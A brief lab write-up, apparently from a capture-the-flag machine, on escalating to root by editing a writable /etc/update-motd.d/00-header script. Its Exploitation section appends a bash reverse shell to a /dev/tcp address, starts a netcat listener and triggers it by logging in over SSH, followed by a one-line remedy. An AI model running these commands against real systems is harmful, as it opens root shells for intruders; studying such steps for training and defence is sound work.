Having permissions to modify /etc/update-motd.d/00-header allows us to inject code and execute it at the time of a user logging in, the code will be executed by the SSH service owner, most likely root
Identify
1. Check the current permissions of the user
- id
2. Verify the folder and file permissions
- ls -ld /etc/update-motd.d
- ls -lR /etc/update-motd.d/
As we can see our user is part of the sysadmin group which has RWX permissions.
Exploitation
1. Modify the file /etc/update-motd.d/00-header, probably add a reverse shell
- echo ‘bash -c “bash -i >& /dev/tcp/10.10.14.6/4444 0>&1″‘ >> /etc/update-motd.d/00-header
2. Start a listener in the attacker machine
- nc -lvp 4444
3. Log again
- ssh sysadmin@10.10.10.181
4. Check the listener and there should be a reverse shell
Remedy
Assign proper permissions to the files in /etc/update-motd.d